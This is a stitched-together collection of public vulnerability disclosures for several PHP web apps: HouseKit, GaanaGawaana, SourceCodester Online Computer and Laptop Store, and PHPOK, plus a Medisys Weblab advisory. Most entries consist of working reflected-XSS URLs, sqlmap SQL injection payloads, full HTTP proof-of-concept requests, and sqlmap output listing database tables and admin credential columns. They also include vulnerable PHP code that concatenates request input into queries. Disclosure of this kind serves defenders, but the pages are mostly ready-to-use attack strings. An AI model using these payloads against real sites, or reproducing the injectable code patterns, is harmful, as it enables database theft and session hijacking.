HouseKit version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : codesler.com                                                               ││  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    ││  Software : HouseKit 1.0 - Rent Property Booking PHP Script                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /flat_details.phpGET parameter 'id' is vulnerable to RXSShttps://website/flat_details.php?id=22&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3EPath: /flats.phpGET parameter 's' is vulnerable to RXSShttps://website/flats.php?tab=on&s=Hyderabadi3phy%3cscript%3ealert(1)%3c%2fscript%3ezx0nx[-] Done

HouseKit 1.0 Cross Site Scripting

HouseKit version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : codesler.com                                                               ││  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    ││  Software : HouseKit 1.0 - Rent Property Booking PHP Script                            ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /flat_details.phpGET parameter 'id' is vulnerable to SQL Injectionhttps://website/flat_details.php?id=[SQLI]---Parameter: id (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=22 AND (SELECT 2116 FROM (SELECT(SLEEP(5)))vxMc)    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: id=-4049 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b706271,0x4175424a73725a4b6b757359756765517a78784a6b50706b464f474978545652546a4a496c505841,0x716b6a6271),NULL,NULL,NULL-- ----Path: /flats.phpGET parameter 's' is vulnerable to SQL Injectionhttps://website/flats.php?tab=on&s=[SQLI]---Parameter: s (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: tab=on&s=Hyderabad' AND (SELECT 5046 FROM (SELECT(SLEEP(5)))BKYF) AND 'ReOi'='ReOi    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: tab=on&s=Hyderabad' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x6e536b46764c48414b6663545a4f78576a56794c74766e5351494f624c786261797255684d5a6d6d,0x716a767071),NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: '**40*26_housekit'fetching tables+--------------+| admin        || flats        || kyc          || owner        || review       || settings     || transactions || users        || wallet       || withdraw     |+--------------+fetching columns for table 'admin'+----------+---------+| Column   | Type    |+----------+---------+| id       | int(11) || password | text    || username | text    |+----------+---------+[-] Done

HouseKit 1.0 SQL Injection

GaanaGawaana version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : codesler.com                                                               ││  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    ││  Software : GaanaGawaana 1.0 - Music Platform PHP Script                               ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchhttps://website/search?q=[SQLI]GET parameter 'q' is vulnerable to SQL Injection---Parameter: q (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: q=' AND (SELECT 3838 FROM (SELECT(SLEEP(5)))giXs) AND 'YaMa'='YaMa    Type: UNION query    Title: Generic UNION query (NULL) - 12 columns    Payload: q=' UNION ALL SELECT NULL,CONCAT(0x716b707671,0x436e596a66675a65667a6c6a574e675142484f46776b4265766847466958456f6f556c4d58465172,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: '***01*6_gaanagawaana'fetching tables+----------+| settings || songs    |+----------+fetching columns for table 'settings'+-----------+--------------+| Column    | Type         |+-----------+--------------+| api_key   | varchar(200) || email     | varchar(50)  || id        | int(11)      || password  | varchar(200) || site_name | longtext     || thumbnail | longtext     || username  | varchar(200) |+-----------+--------------+[-] Done

GaanaGawaana 1.0 SQL Injection

A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file view_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228801 was assigned to this vulnerability.

**Exploit Title: Online Computer and Laptop Store - Multiple vulnerabilities****Date: 2023-05/11****Exploit Author: xiahao@webray.com.cn****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/download-code?nid=16397&title=Online+Computer+and+Laptop+Store+using+PHP+and+MySQL+Source+Code+Free+Download****Version: 1.0****Tested on: macOs 13.3.1 (a) + phpstudy****1.Xss vulnerability in products.php****Sample request POC #1**

    http://10.211.55.3:8001/?p=products&search=%3Cscript%3Ealert(1)%3C/script%3E
    

**Browser Access Results**

**Related Codes /products.php**

    ...
    <div class="<?php echo isset($_GET['c'])? 'col-md-9': 'col-lg-10 offset-md-1' ?>">
                <div class="container-fluid p-0">
                    <?php if(isset($_GET['search'])): ?>
                        <h4 class="text-center py-5"><b>Search Results for '<?php echo $_GET['search'] ?>'</b></h4>
                    <?php endif; ?>
                <div class="row gx-2 gx-lg-2 row-cols-1 row-cols-md-3 row-cols-xl-4">
    ...
    

**2.SQL injection vulnerability in products.php****Sample request POC #2**

    GET /?p=products&c=%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x717a626271,0x6b5378665945517142636658635356665470564a4a7475446563554a4e52454a6173464a426f4451,0x717a6b6a71),NULL,NULL,NULL--%20-&s= HTTP/1.1
    Host: 10.211.55.3:8001
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    

**Sqlmap running results**

**Related Codes /products.php**

    <?php 
    $title = "";
    $sub_title = "";
    if(isset($_GET['c']) && isset($_GET['s'])){
        $cat_qry = $conn->query("SELECT * FROM categories where md5(id) = '{$_GET['c']}'");
        if($cat_qry->num_rows > 0){
            $result =$cat_qry->fetch_assoc();
            $title = $result['category'];
            $cat_description = $result['description'];
        }
     $sub_cat_qry = $conn->query("SELECT * FROM sub_categories where md5(id) = '{$_GET['s']}'");
        if($sub_cat_qry->num_rows > 0){
            $result =$sub_cat_qry->fetch_assoc();
            $sub_title = $result['sub_category'];
            $sub_cat_description = $result['description'];
        }
    }
    elseif(isset($_GET['c'])){
        $cat_qry = $conn->query("SELECT * FROM categories where md5(id) = '{$_GET['c']}'");
        if($cat_qry->num_rows > 0){
            $result =$cat_qry->fetch_assoc();
            $title = $result['category'];
            $cat_description = $result['description'];
        }
    }
    elseif(isset($_GET['s'])){
        $sub_cat_qry = $conn->query("SELECT * FROM sub_categories where md5(id) = '{$_GET['s']}'");
        if($sub_cat_qry->num_rows > 0){
            $result =$sub_cat_qry->fetch_assoc();
            $sub_title = $result['sub_category'];
            $sub_cat_description = $result['description'];
        }
    }
    ?>
    

**3.SQL injection vulnerability in view\_product.php****Sample request POC #3**

    GET /?p=view_product&id=' UNION ALL SELECT 49,49,49,49,49,49,49,49,CONCAT(0x7162627a71,0x4b7a41414f754952634f73526d53446571737665437179644c4f5253534255656463747063445a59,0x7176786b71)-- - HTTP/1.1
    Host: 10.211.55.3:8001
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    

**Sqlmap running results**

**Related Codes /view\_product.php**

    <?php 
     $products = $conn->query("SELECT p.*,b.name as bname FROM `products` p inner join brands b on p.brand_id = b.id where md5(p.id) = '{$_GET['id']}' ");
     if($products->num_rows > 0){
         foreach($products->fetch_assoc() as $k => $v){
             $$k= stripslashes($v);
         }
         $specs_qry = $conn->query("SELECT `meta_field`, `meta_value` FROM `specification_list`  where `product_id` = '{$id}'");
         $specs = array_column($specs_qry->fetch_all(MYSQLI_ASSOC), 'meta_value', 'meta_field');
        $upload_path = base_app.'/uploads/product_'.$id;
        $img = "";
        if(is_dir($upload_path)){
            $fileO = scandir($upload_path);
            if(isset($fileO[2]))
                $img = "uploads/product_".$id."/".$fileO[2];
            // var_dump($fileO);
        }
        $inventory = $conn->query("SELECT * FROM inventory where product_id = ".$id);
        $inv = array();
        while($ir = $inventory->fetch_assoc()){
            $inv[] = $ir;
        }
        $sold = $conn->query("SELECT SUM(ol.quantity) as sold FROM order_list ol inner join orders o on o.id = ol.order_id where ol.product_id='{$id}' and o.`status` != 4 ");
        $sold = $sold->num_rows > 0 ? $sold->fetch_assoc()['sold'] : 0;
     }
    ?>
    

**4.SQL injection vulnerability in view\_categories.php****Sample request POC #4**

    GET /?p=view_categories&c=' UNION ALL SELECT NULL,CONCAT(0x7162706b71,0x69424d474c4c6357514a6d7a5559647757794d756677554f7146785467646b666b466249504c776f,0x717a767871),NULL,NULL,NULL-- -&s= HTTP/1.1
    Host: 10.211.55.3:8001
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    

**Sqlmap running results**

**Related Codes /view\_categories.php**

    <?php 
    $title = "All Product Categories";
    $sub_title = "";
    if(isset($_GET['c']) && isset($_GET['s'])){
        $cat_qry = $conn->query("SELECT * FROM categories where md5(id) = '{$_GET['c']}'");
        if($cat_qry->num_rows > 0){
            $title = $cat_qry->fetch_assoc()['category'];
        }
     $sub_cat_qry = $conn->query("SELECT * FROM sub_categories where md5(id) = '{$_GET['s']}'");
        if($sub_cat_qry->num_rows > 0){
            $sub_title = $sub_cat_qry->fetch_assoc()['sub_category'];
        }
    }
    elseif(isset($_GET['c'])){
        $cat_qry = $conn->query("SELECT * FROM categories where md5(id) = '{$_GET['c']}'");
        if($cat_qry->num_rows > 0){
            $title = $cat_qry->fetch_assoc()['category'];
        }
    }
    elseif(isset($_GET['s'])){
        $sub_cat_qry = $conn->query("SELECT * FROM sub_categories where md5(id) = '{$_GET['s']}'");
        if($sub_cat_qry->num_rows > 0){
            $title = $sub_cat_qry->fetch_assoc()['sub_category'];
        }
    }
    ?>
    

**5.SQL injection vulnerability in ./classes/Master.php****Sample request POC #5**

    POST /classes/Master.php?f=delete_category HTTP/1.1
    Host: 10.211.55.3:8001
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 114
    
    id=' AND GTID_SUBSET(CONCAT(0x717a6a7071,(SELECT (ELT(3659=3659,1))),0x71707a7071),3659)-- Hjjr
    
    

**Sqlmap running results**

**Related Codes ./classes/Master.php**

    ...
    	function delete_category(){
    		extract($_POST);
    		$del = $this->conn->query("DELETE FROM `categories` where id = '{$id}'");
    		if($del){
    			$resp['status'] = 'success';
    			$this->settings->set_flashdata('success',"Category successfully deleted.");
    		}else{
    			$resp['status'] = 'failed';
    			$resp['error'] = $this->conn->error;
    		}
    		return json_encode($resp);
    
    	}
    ...

CVE-2023-2659: CVEproject/Online-Computer-and-Laptop-Store---Multiple-vulnerabilities.md at main · xiahao90/CVEproject

A vulnerability has been found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This vulnerability affects unknown code of the file view_categories.php. The manipulation of the argument c leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228802 is the identifier assigned to this vulnerability.

CVE-2023-2660

A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Master.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228803.

CVE-2023-2661: CVEproject/Online-Computer-and-Laptop-Store---Multiple-vulnerabilities.md at main · xiahao90/CVEproject

GaanaGawaana version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : codesler.com                                                               ││  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    ││  Software : GaanaGawaana 1.0 - Music Platform PHP Script                               ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'q' is vulnerable to RXSShttps://website/search?q=no8pa"><script>alert(1)</script>xb7qk[-] Done

GaanaGawaana 1.0 Cross Site Scripting

A vulnerability, which was classified as critical, has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this issue is some unknown functionality of the file products.php. The manipulation of the argument c leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228800.

CVE-2023-2658

PHPOK v6.3 was discovered to contain a remote code execution (RCE) vulnerability.

\[CVE ID\]

CVE-2022-47129

\[PRODUCT\]

PHPOK

\[VERSION\]

PHPOK v6.3

\[PROBLEM TYPE\]

SQL RCE

\[DESCRIPTION\]

PHPOK v6.3 is vulnerable to SQL RCE

CVE-2022-47129: CVE-2022-47129

Medical Systems Co. Medisys Weblab Products v19.4.03 was discovered to contain a SQL injection vulnerability via the tem:statement parameter in the WSDL files.

****Summary:****

While we were testing healthcare applications, we found an unauthenticated SQL injection vulnerability, an unauthenticated user can inject SQL payload within </tem:statement> parameter in WSDL file and retrieve the database information.

**Vulnerability Details:**

*   **Vendor**: Medical Systems Co. — medisys
*   **Vulnerability:** SQL injection
*   **Affected Version:** Weblab Products — 19.4.03
*   **Vendor Homepage:** https://www.amano.eu/en/
*   **CVE:** CVE-2023–29863

**Vulnerability Description:**

A SQL Injection attack consists of the insertion or injection of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database, or cause a denial of service.

**Vulnerability Implications:**

An attacker can mount one or more of the following type of attacks successfully: 

*   Reading, updating and deleting arbitrary data/tables from the database.
*   Executing commands on the underlying operating system. 
*   Cause a denial-of-service to the application.

**Vulnerability Actions:**

A very robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements).

Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

**CVE PoC:**

1- Access WSDL file -> service +?WSDL

2- Parse WSDL using Burp and start manipulating the </tem:statement> parameter, you will receive a SQL error

3- Ijnect SQL payload in </tem:statement> parameter , for example check the Database version and type.

**Acknowledgment:**

I would like to thank Mahub alHarbi https://www.linkedin.com/in/k3l03/ for his support.

Thank you.

https://www.linkedin.com/in/waad-albayyali-0475a7160/

Saudi Information and Technology Company — SITE

Tag

#sql